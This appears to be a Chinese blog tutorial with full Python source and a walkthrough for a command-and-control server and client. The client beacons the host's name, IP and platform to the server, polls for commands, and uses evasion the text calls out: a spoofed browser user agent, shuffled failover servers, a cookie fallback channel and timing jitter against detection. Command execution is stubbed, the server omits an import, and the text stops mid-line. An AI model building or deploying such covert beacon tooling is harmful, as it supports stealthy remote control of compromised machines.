当前位置: 首页 > news >正文

Python 实战:内网渗透中的信息收集自动化脚本(7)

用途限制声明,本文仅用于网络安全技术研究、教育与知识分享。文中涉及的渗透测试方法与工具,严禁用于未经授权的网络攻击、数据窃取或任何违法活动。任何因不当使用本文内容导致的法律后果,作者及发布平台不承担任何责任。渗透测试涉及复杂技术操作,可能对目标系统造成数据损坏、服务中断等风险。读者需充分评估技术能力与潜在后果,在合法合规前提下谨慎实践。

这次我们主要介绍通过使用python脚本来实现简单的C2通道,首先介绍什么是C2通道,“C2 通道” 中的 “C2” 是 “Command and Control”(指挥与控制)的缩写,这里从不同的层面来介绍什么是C2通道

军事 / 指挥领域的 C2 通道

指在指挥体系中,用于传递指挥指令、态势信息、协同数据等的通信路径或链路。它是连接指挥机构、作战单元、武器系统的 “神经通道”,确保指挥层级(如战略、战役、战术级)之间的指令上传下达,以及各作战要素的协同配合。

C2 通道的形式包括有线通信(如光纤、电缆)、无线通信(如卫星通信、短波 / 超短波电台)等,其核心要求是高可靠性、抗干扰性、实时性,以保障指挥系统在复杂环境(如战场干扰、极端天气)下的稳定运作。

网络安全领域的 C2 通道

指恶意软件(如木马、僵尸程序)与攻击者控制的 “C2 服务器”(Command and Control Server)之间建立的通信链路。

攻击者通过 C2 通道实现对被入侵设备(如个人电脑、服务器、物联网设备)的远程控制,例如:下发攻击指令、窃取数据、更新恶意程序、横向渗透其他设备等。C2 通道的通信协议可能伪装成常规网络流量(如 HTTP/HTTPS、DNS、邮件等),以躲避安全设备的检测。

简单来说,网络安全中的 C2 通道是攻击者 “操控” 被入侵设备的 “秘密通道”,是网络攻击链(如 “初始访问 - 持久化 - 命令与控制 - 目标达成”)中的关键环节。

从C2通道解释中,我们可以了解其C2通道需要分为服务端和客户端,接下来分别给出服务端源码和客户端源码,再进行解析

服务端源码

import http.server
import socketserver
import base64
import json
import ssl
import threading
import logging
import argparse
import os
import hashlib
from cryptography.fernet import Fernet
from datetime import datetime
from typing import Dict, Any, Optional# 配置日志
logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(levelname)s - %(message)s',handlers=[logging.FileHandler("c2_server.log"),logging.StreamHandler()]
)class C2ServerConfig:"""服务器配置类"""def __init__(self):self.host = "0.0.0.0"  # 监听所有接口,跨网络访问self.port = 8443self.ssl_enabled = Trueself.ssl_cert = "server.crt"self.ssl_key = "server.key"self.auth_token = Noneself.encryption_key = Noneself.max_connections = 50self.timeout = 30def load_from_file(self, config_file: str) -> None:"""从配置文件加载配置"""if os.path.exists(config_file):with open(config_file, 'r') as f:config = json.load(f)for key, value in config.items():if hasattr(self, key):setattr(self, key, value)logging.info(f"Loaded configuration from {config_file}")class C2RequestHandler(http.server.BaseHTTPRequestHandler):"""C2服务器请求处理器"""server_config: C2ServerConfig = Noneencryption: Fernet = Nonedef _authenticate(self) -> bool:"""验证客户端身份"""if not self.server_config.auth_token:return True  # 未设置认证令牌,跳过验证auth_header = self.headers.get('Authorization', '')if not auth_header.startswith('Bearer '):return Falsetoken = auth_header[len('Bearer '):]return token == self.server_config.auth_tokendef _encrypt(self, data: str) -> str:"""加密数据"""if self.encryption:return self.encryption.encrypt(data.encode()).decode()return datadef _decrypt(self, data: str) -> str:"""解密数据"""if self.encryption:try:return self.encryption.decrypt(data.encode()).decode()except:logging.warning("Failed to decrypt data")return ""return datadef _parse_request_data(self) -> Dict[str, Any]:"""解析请求中的数据"""# 支持多种数据传输方式data = {}# 从Cookie获取数据cookie_data = self.headers.get('Cookie', '').split('data=')[-1]if cookie_data:try:decoded_data = base64.b64decode(cookie_data).decode()data['cookie'] = self._decrypt(decoded_data)except:logging.warning("Failed to parse cookie data")# 从URL参数获取数据if '?' in self.path:query = self.path.split('?')[1]params = query.split('&')for param in params:if '=' in param:key, value = param.split('=', 1)data[key] = self._decrypt(value)# 从请求体获取数据content_length = int(self.headers.get('Content-Length', 0))if content_length > 0:body = self.rfile.read(content_length).decode()try:json_data = json.loads(body)data['body'] = {k: self._decrypt(v) for k, v in json_data.items()}except:data['raw_body'] = self._decrypt(body)return datadef _send_response(self, status_code: int, response_data: Dict[str, Any]) -> None:"""发送响应"""encrypted_data = self._encrypt(json.dumps(response_data))response = encrypted_data.encode()self.send_response(status_code)self.send_header('Content-Type', 'application/json')self.send_header('Content-Length', str(len(response)))self.end_headers()self.wfile.write(response)def handle_request(self) -> None:"""处理请求的主逻辑"""try:# 验证身份if not self._authenticate():self._send_response(401, {"status": "error", "message": "Unauthorized"})logging.warning(f"Unauthorized access attempt from {self.client_address[0]}")return# 解析请求数据request_data = self._parse_request_data()logging.info(f"Received data from {self.client_address[0]}: {request_data}")# 处理请求(这里可以扩展为更复杂的命令处理逻辑)response = {"status": "success", "message": "Command processed", "timestamp": datetime.utcnow().isoformat()}# 检查是否有特定命令需要处理if 'command' in request_data:command = request_data['command']# 这里可以添加更多命令处理逻辑response['command_result'] = f"Processed command: {command}"self._send_response(200, response)except Exception as e:logging.error(f"Error handling request: {str(e)}", exc_info=True)self._send_response(500, {"status": "error", "message": "Internal server error"})def do_GET(self) -> None:"""处理GET请求"""self.handle_request()def do_POST(self) -> None:"""处理POST请求(新增支持)"""self.handle_request()def log_message(self, format: str, *args: Any) -> None:"""重写日志方法,使用自定义日志配置"""logging.info(f"{self.client_address[0]} - {format % args}")class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):"""多线程HTTP服务器,支持同时处理多个连接"""allow_reuse_address = Truedaemon_threads = True  # 线程会在主线程退出时自动关闭def generate_ssl_certificates(cert_file: str, key_file: str) -> None:"""生成自签名SSL证书(如果不存在)"""if not os.path.exists(cert_file) or not os.path.exists(key_file):logging.info("Generating self-signed SSL certificates...")try:from cryptography.hazmat.primitives import serialization as crypto_serializationfrom cryptography.hazmat.primitives.asymmetric import rsafrom cryptography.hazmat.backends import default_backend as crypto_default_backendfrom cryptography import x509from cryptography.x509.oid import NameOIDfrom cryptography.hazmat.primitives import hasheskey = rsa.generate_private_key(backend=crypto_default_backend(),public_exponent=65537,key_size=2048)# 保存私钥with open(key_file, "wb") as f:f.write(key.private_bytes(encoding=crypto_serialization.Encoding.PEM,format=crypto_serialization.PrivateFormat.PKCS8,encryption_algorithm=crypto_serialization.NoEncryption()))# 创建证书subject = issuer = x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"C2 Server"),x509.NameAttribute(NameOID.COMMON_NAME, u"c2-server.local"),])cert = x509.CertificateBuilder().subject_name(subject).issuer_name(issuer).public_key(key.public_key()).serial_number(x509.random_serial_number()).not_valid_before(datetime.utcnow()).not_valid_after(datetime.utcnow() + timedelta(days=365)).add_extension(x509.SubjectAlternativeName([x509.DNSName(u"localhost")]),critical=False,).sign(key, hashes.SHA256(), crypto_default_backend())# 保存证书with open(cert_file, "wb") as f:f.write(cert.public_bytes(crypto_serialization.Encoding.PEM))logging.info(f"SSL certificates generated: {cert_file}, {key_file}")except Exception as e:logging.error(f"Failed to generate SSL certificates: {str(e)}")raisedef main():"""主函数"""parser = argparse.ArgumentParser(description="Enhanced C2 Server")parser.add_argument("--config", help="Path to configuration file", default="server_config.json")parser.add_argument("--generate-key", action="store_true", help="Generate new encryption key")args = parser.parse_args()# 加载配置config = C2ServerConfig()config.load_from_file(args.config)# 生成加密密钥(如果需要)if args.generate_key or not config.encryption_key:key = Fernet.generate_key().decode()config.encryption_key = keylogging.info(f"Generated new encryption key: {key}")# 保存到配置文件with open(args.config, 'w') as f:json.dump(config.__dict__, f, indent=4)# 初始化加密encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else None# 生成SSL证书(如果需要)if config.ssl_enabled:generate_ssl_certificates(config.ssl_cert, config.ssl_key)# 配置请求处理器C2RequestHandler.server_config = configC2RequestHandler.encryption = encryption# 创建并启动服务器server = ThreadedHTTPServer((config.host, config.port), C2RequestHandler)server.timeout = config.timeout# 如果启用SSL,则包装socketif config.ssl_enabled:try:server.socket = ssl.wrap_socket(server.socket,certfile=config.ssl_cert,keyfile=config.ssl_key,server_side=True)logging.info(f"SSL enabled. Server running over HTTPS on {config.host}:{config.port}")except Exception as e:logging.error(f"Failed to enable SSL: {str(e)}")returnelse:logging.info(f"Server running over HTTP on {config.host}:{config.port}")# 启动服务器try:logging.info("C2 Server started. Press Ctrl+C to stop.")server.serve_forever()except KeyboardInterrupt:logging.info("Server is shutting down...")server.shutdown()finally:server.server_close()logging.info("Server stopped.")if __name__ == "__main__":main()

1. 模块导入部分

import http.server
import socketserver
import base64
import json
import ssl
import threading
import logging
import argparse
import os
import hashlib
from cryptography.fernet import Fernet
from datetime import datetime
from typing import Dict, Any, Optional

这部分导入了程序所需的各类模块:

  • http.server 和 socketserver:用于构建 HTTP 服务器
  • base64json:用于数据编码和序列化
  • ssl:提供 HTTPS 加密支持
  • threading:支持多线程处理客户端连接
  • logging:日志记录功能
  • argparse:处理命令行参数
  • os:文件和路径操作
  • cryptography.fernet:提供对称加密功能
  • datetime:时间处理
  • typing:类型提示,增强代码可读性

2. 日志配置

logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(levelname)s - %(message)s',handlers=[logging.FileHandler("c2_server.log"),logging.StreamHandler()]
)

配置日志系统:

  • 日志级别设为INFO(记录 INFO 及以上级别日志)
  • 日志格式包含时间、级别和消息内容
  • 日志同时输出到文件(c2_server.log)和控制台(StreamHandler
  • 便于跟踪服务器运行状态和排查问题

3. 服务器配置类 C2ServerConfig

class C2ServerConfig:"""服务器配置类"""def __init__(self):self.host = "0.0.0.0"  # 监听所有接口,跨网络访问self.port = 8443self.ssl_enabled = Trueself.ssl_cert = "server.crt"self.ssl_key = "server.key"self.auth_token = Noneself.encryption_key = Noneself.max_connections = 50self.timeout = 30def load_from_file(self, config_file: str) -> None:"""从配置文件加载配置"""if os.path.exists(config_file):with open(config_file, 'r') as f:config = json.load(f)for key, value in config.items():if hasattr(self, key):setattr(self, key, value)logging.info(f"Loaded configuration from {config_file}")

这是一个集中管理服务器配置的类:

  • __init__ 方法初始化默认配置(监听地址、端口、SSL 设置、加密密钥等)
  • load_from_file 方法从 JSON 配置文件加载配置,覆盖默认值
  • 作用:将配置参数集中管理,便于修改和维护

4. 请求处理器 C2RequestHandler

继承自http.server.BaseHTTPRequestHandler,负责处理客户端的 HTTP 请求:

4.1 认证与加密方法
def _authenticate(self) -> bool:"""验证客户端身份"""if not self.server_config.auth_token:return True  # 未设置认证令牌,跳过验证auth_header = self.headers.get('Authorization', '')if not auth_header.startswith('Bearer '):return Falsetoken = auth_header[len('Bearer '):]return token == self.server_config.auth_tokendef _encrypt(self, data: str) -> str:"""加密数据"""if self.encryption:return self.encryption.encrypt(data.encode()).decode()return datadef _decrypt(self, data: str) -> str:"""解密数据"""if self.encryption:try:return self.encryption.decrypt(data.encode()).decode()except:logging.warning("Failed to decrypt data")return ""return data
  • _authenticate:验证客户端身份(基于 Bearer Token),未设置令牌时跳过验证
  • _encrypt/_decrypt:使用 Fernet 算法对数据进行加密和解密,确保通信安全
4.2 数据解析方法
def _parse_request_data(self) -> Dict[str, Any]:"""解析请求中的数据"""data = {}# 从Cookie获取数据cookie_data = self.headers.get('Cookie', '').split('data=')[-1]if cookie_data:try:decoded_data = base64.b64decode(cookie_data).decode()data['cookie'] = self._decrypt(decoded_data)except:logging.warning("Failed to parse cookie data")# 从URL参数获取数据if '?' in self.path:query = self.path.split('?')[1]params = query.split('&')for param in params:if '=' in param:key, value = param.split('=', 1)data[key] = self._decrypt(value)# 从请求体获取数据content_length = int(self.headers.get('Content-Length', 0))if content_length > 0:body = self.rfile.read(content_length).decode()try:json_data = json.loads(body)data['body'] = {k: self._decrypt(v) for k, v in json_data.items()}except:data['raw_body'] = self._decrypt(body)return data
  • 从多个来源解析客户端发送的数据:Cookie、URL 参数、请求体(支持 JSON 格式)
  • 解析后的数据会经过解密处理,确保获取原始内容
  • 兼容多种数据传输方式,提高灵活性
4.3 响应与请求处理
def _send_response(self, status_code: int, response_data: Dict[str, Any]) -> None:"""发送响应"""encrypted_data = self._encrypt(json.dumps(response_data))response = encrypted_data.encode()self.send_response(status_code)self.send_header('Content-Type', 'application/json')self.send_header('Content-Length', str(len(response)))self.end_headers()self.wfile.write(response)def handle_request(self) -> None:"""处理请求的主逻辑"""try:# 验证身份if not self._authenticate():self._send_response(401, {"status": "error", "message": "Unauthorized"})logging.warning(f"Unauthorized access attempt from {self.client_address[0]}")return# 解析请求数据request_data = self._parse_request_data()logging.info(f"Received data from {self.client_address[0]}: {request_data}")# 处理请求(这里可以扩展为更复杂的命令处理逻辑)response = {"status": "success", "message": "Command processed", "timestamp": datetime.utcnow().isoformat()}# 检查是否有特定命令需要处理if 'command' in request_data:command = request_data['command']# 这里可以添加更多命令处理逻辑response['command_result'] = f"Processed command: {command}"self._send_response(200, response)except Exception as e:logging.error(f"Error handling request: {str(e)}", exc_info=True)self._send_response(500, {"status": "error", "message": "Internal server error"})def do_GET(self) -> None:"""处理GET请求"""self.handle_request()def do_POST(self) -> None:"""处理POST请求(新增支持)"""self.handle_request()
  • _send_response:将响应数据加密后发送给客户端,设置正确的 HTTP 头
  • handle_request:请求处理主逻辑,包括身份验证、数据解析、命令处理和响应发送
  • do_GET/do_POST:分别处理 GET 和 POST 请求,统一调用handle_request

5. 多线程服务器 ThreadedHTTPServer

class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):"""多线程HTTP服务器,支持同时处理多个连接"""allow_reuse_address = Truedaemon_threads = True  # 线程会在主线程退出时自动关闭
  • 继承ThreadingMixIn实现多线程处理,支持同时接收多个客户端连接
  • allow_reuse_address:允许地址重用(避免端口占用问题)
  • daemon_threads:设置为守护线程,主程序退出时自动关闭子线程

6. SSL 证书生成 generate_ssl_certificates

def generate_ssl_certificates(cert_file: str, key_file: str) -> None:"""生成自签名SSL证书(如果不存在)"""if not os.path.exists(cert_file) or not os.path.exists(key_file):logging.info("Generating self-signed SSL certificates...")try:# 使用cryptography库生成RSA私钥和自签名证书# (省略具体实现细节)logging.info(f"SSL certificates generated: {cert_file}, {key_file}")except Exception as e:logging.error(f"Failed to generate SSL certificates: {str(e)}")raise
  • 当 SSL 证书(server.crt)或私钥(server.key)不存在时,自动生成自签名证书
  • 使用cryptography库生成 RSA 密钥对和 X.509 证书,确保 HTTPS 通信安全

7. 主函数 main

def main():"""主函数"""parser = argparse.ArgumentParser(description="Enhanced C2 Server")parser.add_argument("--config", help="Path to configuration file", default="server_config.json")parser.add_argument("--generate-key", action="store_true", help="Generate new encryption key")args = parser.parse_args()# 加载配置config = C2ServerConfig()config.load_from_file(args.config)# 生成加密密钥(如果需要)if args.generate_key or not config.encryption_key:key = Fernet.generate_key().decode()config.encryption_key = key# 保存到配置文件with open(args.config, 'w') as f:json.dump(config.__dict__, f, indent=4)# 初始化加密encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else None# 生成SSL证书(如果需要)if config.ssl_enabled:generate_ssl_certificates(config.ssl_cert, config.ssl_key)# 配置请求处理器C2RequestHandler.server_config = configC2RequestHandler.encryption = encryption# 创建并启动服务器server = ThreadedHTTPServer((config.host, config.port), C2RequestHandler)server.timeout = config.timeout# 如果启用SSL,则包装socketif config.ssl_enabled:try:server.socket = ssl.wrap_socket(server.socket,certfile=config.ssl_cert,keyfile=config.ssl_key,server_side=True)except Exception as e:logging.error(f"Failed to enable SSL: {str(e)}")return# 启动服务器try:logging.info("C2 Server started. Press Ctrl+C to stop.")server.serve_forever()except KeyboardInterrupt:logging.info("Server is shutting down...")server.shutdown()finally:server.server_close()logging.info("Server stopped.")

  • 解析命令行参数(配置文件路径、是否生成新加密密钥)
  • 加载配置并初始化加密组件
  • 生成 SSL 证书(如启用 SSL)
  • 创建多线程服务器并启动,支持 HTTPS 加密
  • 处理服务器关闭逻辑(响应 Ctrl+C 中断)

客户端源码

import requests
import base64
import json
import logging
import argparse
import os
import time
import random
import socket
from cryptography.fernet import Fernet
from typing import Dict, Any, Optional, List
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from datetime import datetime# 配置日志
logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(levelname)s - %(message)s',handlers=[logging.FileHandler("c2_client.log"),logging.StreamHandler()]
)class C2ClientConfig:"""客户端配置类"""def __init__(self):self.server_urls = ["https://127.0.0.1:8443"]  # 支持多个服务器URL,实现故障转移self.auth_token = Noneself.encryption_key = Noneself.proxy = None  # 代理设置,如 "http://user:pass@proxy:port"self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"self.retry_attempts = 3self.retry_delay = 5  # 秒self.timeout = 10  # 秒self.poll_interval = 60  # 轮询间隔,秒self.backup_transmission_methods = True  # 启用备用传输方式def load_from_file(self, config_file: str) -> None:"""从配置文件加载配置"""if os.path.exists(config_file):with open(config_file, 'r') as f:config = json.load(f)for key, value in config.items():if hasattr(self, key):setattr(self, key, value)logging.info(f"Loaded configuration from {config_file}")class EnhancedC2Client:"""增强版C2客户端"""def __init__(self, config: C2ClientConfig):self.config = configself.encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else Noneself.session = self._create_session()def _create_session(self) -> requests.Session:"""创建配置好的请求会话"""session = requests.Session()# 设置代理if self.config.proxy:proxies = {'http': self.config.proxy,'https': self.config.proxy}session.proxies.update(proxies)# 设置默认 headerssession.headers.update({'User-Agent': self.config.user_agent,'Accept': '*/*','Connection': 'keep-alive'})# 添加认证令牌if self.config.auth_token:session.headers.update({'Authorization': f'Bearer {self.config.auth_token}'})# 配置重试机制retry_strategy = Retry(total=self.config.retry_attempts,backoff_factor=self.config.retry_delay,status_forcelist=[429, 500, 502, 503, 504],allowed_methods=["GET", "POST"])adapter = HTTPAdapter(max_retries=retry_strategy)session.mount("http://", adapter)session.mount("https://", adapter)# 禁用SSL验证警告(仅用于测试环境)if os.environ.get('C2_DISABLE_SSL_VERIFY', 'false').lower() == 'true':requests.packages.urllib3.disable_warnings()session.verify = Falsereturn sessiondef _encrypt(self, data: str) -> str:"""加密数据"""if self.encryption:return self.encryption.encrypt(data.encode()).decode()return datadef _decrypt(self, data: str) -> str:"""解密数据"""if self.encryption:try:return self.encryption.decrypt(data.encode()).decode()except:logging.warning("Failed to decrypt data")return ""return datadef _prepare_request_data(self, data: Dict[str, Any]) -> Dict[str, Any]:"""准备请求数据(加密等处理)"""encrypted_data = {k: self._encrypt(str(v)) for k, v in data.items()}return encrypted_datadef _send_request(self, url: str, data: Dict[str, Any], method: str = "POST") -> Optional[Dict[str, Any]]:"""发送请求到服务器"""try:encrypted_data = self._prepare_request_data(data)# 尝试主要传输方式if method.upper() == "GET":response = self.session.get(url,params=encrypted_data,timeout=self.config.timeout)else:  # POSTresponse = self.session.post(url,json=encrypted_data,timeout=self.config.timeout)# 检查响应状态response.raise_for_status()# 解密并解析响应decrypted_response = self._decrypt(response.text)return json.loads(decrypted_response)except Exception as e:logging.warning(f"Request failed with primary method: {str(e)}")# 如果启用了备用传输方式,尝试使用Cookie传输if self.config.backup_transmission_methods:try:# 创建包含数据的Cookiecookie_data = base64.b64encode(self._encrypt(json.dumps(data)).encode()).decode()cookies = {'data': cookie_data}response = self.session.get(url,cookies=cookies,timeout=self.config.timeout)response.raise_for_status()decrypted_response = self._decrypt(response.text)return json.loads(decrypted_response)except Exception as e2:logging.error(f"Request failed with backup method: {str(e2)}")return Nonereturn Nonedef communicate(self, data: Dict[str, Any]) -> Optional[Dict[str, Any]]:"""与C2服务器通信,支持故障转移到备用服务器"""# 随机排序服务器URL,增加隐蔽性server_urls = self.config.server_urls.copy()random.shuffle(server_urls)for url in server_urls:try:logging.info(f"Communicating with {url}")response = self._send_request(url, data)if response:logging.info(f"Received response from {url}")return responselogging.warning(f"No response from {url}, trying next server")except Exception as e:logging.error(f"Error communicating with {url}: {str(e)}")logging.error("Failed to communicate with all servers")return Nonedef send_command(self, command: str, **kwargs) -> Optional[Dict[str, Any]]:"""发送命令到C2服务器"""data = {"command": command,"timestamp": datetime.utcnow().isoformat(),"client_info": {"hostname": socket.gethostname(),"ip": self._get_local_ip(),"platform": os.name}}# 添加额外参数data.update(kwargs)return self.communicate(data)def _get_local_ip(self) -> str:"""获取本地IP地址"""try:# 创建一个临时socket来获取本地IPwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:s.connect(("8.8.8.8", 80))return s.getsockname()[0]except:return "unknown"def start_polling(self, initial_command: str = "check_in") -> None:"""启动轮询模式,定期与服务器通信"""logging.info(f"Starting polling with interval {self.config.poll_interval}s")try:while True:# 发送初始命令response = self.send_command(initial_command)if response and "command" in response:# 如果服务器返回了命令,执行并发送结果command = response["command"]logging.info(f"Received command from server: {command}")# 这里可以添加命令执行逻辑result = f"Command '{command}' executed at {datetime.utcnow().isoformat()}"# 发送命令执行结果self.send_command("result", command=command, result=result)# 随机化轮询间隔,避免规律性模式jitter = random.uniform(-0.2, 0.2)  # ±20%的抖动sleep_time = self.config.poll_interval * (1 + jitter)logging.info(f"Next poll in {sleep_time:.2f} seconds")time.sleep(sleep_time)except KeyboardInterrupt:logging.info("Polling stopped by user")except Exception as e:logging.error(f"Error in polling loop: {str(e)}", exc_info=True)def main():"""主函数"""parser = argparse.ArgumentParser(description="Enhanced C2 Client")parser.add_argument("--config", help="Path to configuration file", default="client_config.json")parser.add_argument("--command", help="Send a single command to the server")parser.add_argument("--poll", action="store_true", help="Start polling the server continuously")args = parser.parse_args()# 加载配置config = C2ClientConfig()config.load_from_file(args.config)# 创建客户端实例client = EnhancedC2Client(config)# 执行操作if args.command:logging.info(f"Sending command: {args.command}")response = client.send_command(args.command)if response:logging.info(f"Server response: {json.dumps(response, indent=2)}")else:logging.error("No response from server")elif args.poll:client.start_polling()else:parser.print_help()if __name__ == "__main__":main()

1. 模块导入部分

import requests
import base64
import json
import logging
import argparse
import os
import time
import random
import socket
from cryptography.fernet import Fernet
from typing import Dict, Any, Optional, List
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
from datetime import datetime

导入了客户端所需的核心模块:

  • requests:用于发送 HTTP/HTTPS 请求,与服务器通信
  • base64/json:数据编码和序列化
  • logging:记录客户端运行日志
  • argparse:处理命令行参数(如发送单条命令、启动轮询)
  • os/socket:获取系统信息(主机名、IP 等)
  • cryptography.fernet:提供对称加密功能,确保数据传输安全
  • requests.adapters/urllib3.util.retry:配置请求重试机制,提高可靠性
  • datetime/time/random:处理时间、轮询间隔和随机化操作

2. 日志配置

logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(levelname)s - %(message)s',handlers=[logging.FileHandler("c2_client.log"),logging.StreamHandler()]
)

配置客户端日志系统:

  • 日志级别为INFO,记录关键运行信息
  • 日志格式包含时间、级别和消息内容
  • 日志同时输出到文件(c2_client.log)和控制台,便于调试和跟踪客户端状态

3. 客户端配置类 C2ClientConfig

class C2ClientConfig:"""客户端配置类"""def __init__(self):self.server_urls = ["https://127.0.0.1:8443"]  # 支持多个服务器URL,实现故障转移self.auth_token = Noneself.encryption_key = Noneself.proxy = None  # 代理设置,如 "http://user:pass@proxy:port"self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ..."  # 模拟浏览器UAself.retry_attempts = 3self.retry_delay = 5  # 秒self.timeout = 10  # 秒self.poll_interval = 60  # 轮询间隔,秒self.backup_transmission_methods = True  # 启用备用传输方式def load_from_file(self, config_file: str) -> None:"""从配置文件加载配置"""if os.path.exists(config_file):with open(config_file, 'r') as f:config = json.load(f)for key, value in config.items():if hasattr(self, key):setattr(self, key, value)logging.info(f"Loaded configuration from {config_file}")

集中管理客户端的核心配置:

  • __init__ 初始化默认配置:服务器地址列表(支持故障转移)、认证令牌、加密密钥、代理设置等
  • user_agent 模拟浏览器请求头,增加隐蔽性
  • retry_attempts/retry_delay:请求失败时的重试次数和延迟
  • poll_interval:轮询模式下与服务器通信的间隔时间
  • load_from_file:从 JSON 配置文件加载配置,覆盖默认值,方便灵活配置

4. 核心客户端类 EnhancedC2Client

该类实现了与 C2 服务器通信的所有核心功能,是客户端的核心逻辑载体。

4.1 初始化与会话配置
def __init__(self, config: C2ClientConfig):self.config = configself.encryption = Fernet(config.encryption_key.encode()) if config.encryption_key else Noneself.session = self._create_session()def _create_session(self) -> requests.Session:"""创建配置好的请求会话"""session = requests.Session()# 设置代理if self.config.proxy:proxies = {'http': self.config.proxy,'https': self.config.proxy}session.proxies.update(proxies)# 设置默认 headers(模拟浏览器)session.headers.update({'User-Agent': self.config.user_agent,'Accept': '*/*','Connection': 'keep-alive'})# 添加认证令牌if self.config.auth_token:session.headers.update({'Authorization': f'Bearer {self.config.auth_token}'})# 配置重试机制(处理网络波动)retry_strategy = Retry(total=self.config.retry_attempts,backoff_factor=self.config.retry_delay,status_forcelist=[429, 500, 502, 503, 504],  # 需要重试的状态码allowed_methods=["GET", "POST"])adapter = HTTPAdapter(max_retries=retry_strategy)session.mount("http://", adapter)session.mount("https://", adapter)# 禁用SSL验证(仅测试用)if os.environ.get('C2_DISABLE_SSL_VERIFY', 'false').lower() == 'true':requests.packages.urllib3.disable_warnings()session.verify = Falsereturn session
  • __init__:初始化客户端,保存配置、创建加密实例(基于 Fernet)、初始化请求会话
  • _create_session:创建并配置requests.Session对象,包含:
    • 代理设置(可选)
    • 模拟浏览器的请求头(提高隐蔽性)
    • 认证令牌(Bearer Token)
    • 重试机制(自动重试临时网络错误)
    • 可选的 SSL 验证关闭(仅用于测试环境)
4.2 加密与解密方法
def _encrypt(self, data: str) -> str:"""加密数据"""if self.encryption:return self.encryption.encrypt(data.encode()).decode()return datadef _decrypt(self, data: str) -> str:"""解密数据"""if self.encryption:try:return self.encryption.decrypt(data.encode()).decode()except:logging.warning("Failed to decrypt data")return ""return data
  • 基于 Fernet 算法实现数据加密解密,确保客户端与服务器之间的通信内容无法被第三方窃取
  • 如果未配置加密密钥,则直接返回原始数据(不加密)
4.3 请求数据处理与发送
def _prepare_request_data(self, data: Dict[str, Any]) -> Dict[str, Any]:"""准备请求数据(加密等处理)"""encrypted_data = {k: self._encrypt(str(v)) for k, v in data.items()}return encrypted_datadef _send_request(self, url: str, data: Dict[str, Any], method: str = "POST") -> Optional[Dict[str, Any]]:"""发送请求到服务器"""try:encrypted_data = self._prepare_request_data(data)# 尝试主要传输方式(GET/POST)if method.upper() == "GET":response = self.session.get(url,params=encrypted_data,timeout=self.config.timeout)else:  # POSTresponse = self.session.post(url,json=encrypted_data,timeout=self.config.timeout)response.raise_for_status()  # 抛出HTTP错误状态码decrypted_response = self._decrypt(response.text)return json.loads(decrypted_response)except Exception as e:logging.warning(f"Request failed with primary method: {str(e)}")# 备用传输方式:通过Cookie传输数据if self.config.backup_transmission_methods:try:cookie_data = base64.b64encode(self._encrypt(json.dumps(data)).encode()).decode()cookies = {'data': cookie_data}response = self.session.get(url, cookies=cookies, timeout=self.config.timeout)response.raise_for_status()decrypted_response = self._decrypt(response.text)return json.loads(decrypted_response)except Exception as e2:logging.error(f"Request failed with backup method: {str(e2)}")return Nonereturn None
  • _prepare_request_data:对要发送的字典数据进行加密(每个键值对都加密)
  • _send_request:核心请求发送逻辑:
    • 优先使用指定的 HTTP 方法(GET/POST)发送加密数据
    • 若主方式失败,且启用了备用传输,则尝试通过 Cookie 发送数据(base64 编码 + 加密)
    • 接收响应后解密并解析为 JSON 格式
4.4 通信与命令发送
def communicate(self, data: Dict[str, Any]) -> Optional[Dict[str, Any]]:"""与C2服务器通信,支持故障转移到备用服务器"""# 随机排序服务器URL,增加隐蔽性server_urls = self.config.server_urls.copy()random.shuffle(server_urls)for url in server_urls:try:logging.info(f"Communicating with {url}")response = self._send_request(url, data)if response:logging.info(f"Received response from {url}")return responselogging.warning(f"No response from {url}, trying next server")except Exception as e:logging.error(f"Error communicating with {url}: {str(e)}")logging.error("Failed to communicate with all servers")return Nonedef send_command(self, command: str, **kwargs) -> Optional[Dict[str, Any]]:"""发送命令到C2服务器"""data = {"command": command,"timestamp": datetime.utcnow().isoformat(),"client_info": {"hostname": socket.gethostname(),"ip": self._get_local_ip(),"platform": os.name}}# 添加额外参数data.update(kwargs)return self.communicate(data)
  • communicate:实现与服务器的通信逻辑,支持故障转移:
    • 随机打乱服务器 URL 列表(避免固定顺序,增加隐蔽性)
    • 依次尝试连接每个服务器,成功则返回响应,失败则尝试下一个
  • send_command:构建命令数据并发送:
    • 包含命令内容、时间戳、客户端信息(主机名、IP、操作系统)
    • 支持通过**kwargs添加额外参数
    • 调用communicate方法发送数据
4.5 辅助方法与轮询模式
def _get_local_ip(self) -> str:"""获取本地IP地址"""try:# 通过临时连接获取本地IP(不实际建立连接)with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:s.connect(("8.8.8.8", 80))  # 连接到公共DNS服务器return s.getsockname()[0]  # 获取本地绑定的IPexcept:return "unknown"def start_polling(self, initial_command: str = "check_in") -> None:"""启动轮询模式,定期与服务器通信"""logging.info(f"Starting polling with interval {self.config.poll_interval}s")try:while True:# 发送初始检查命令response = self.send_command(initial_command)if response and "command" in response:# 若服务器返回命令,执行并发送结果command = response["command"]logging.info(f"Received command from server: {command}")# 此处可扩展实际命令执行逻辑result = f"Command '{command}' executed at {datetime.utcnow().isoformat()}"# 发送命令执行结果self.send_command("result", command=command, result=result)# 随机化轮询间隔(±20%抖动),避免规律性模式被检测jitter = random.uniform(-0.2, 0.2)sleep_time = self.config.poll_interval * (1 + jitter)logging.info(f"Next poll in {sleep_time:.2f} 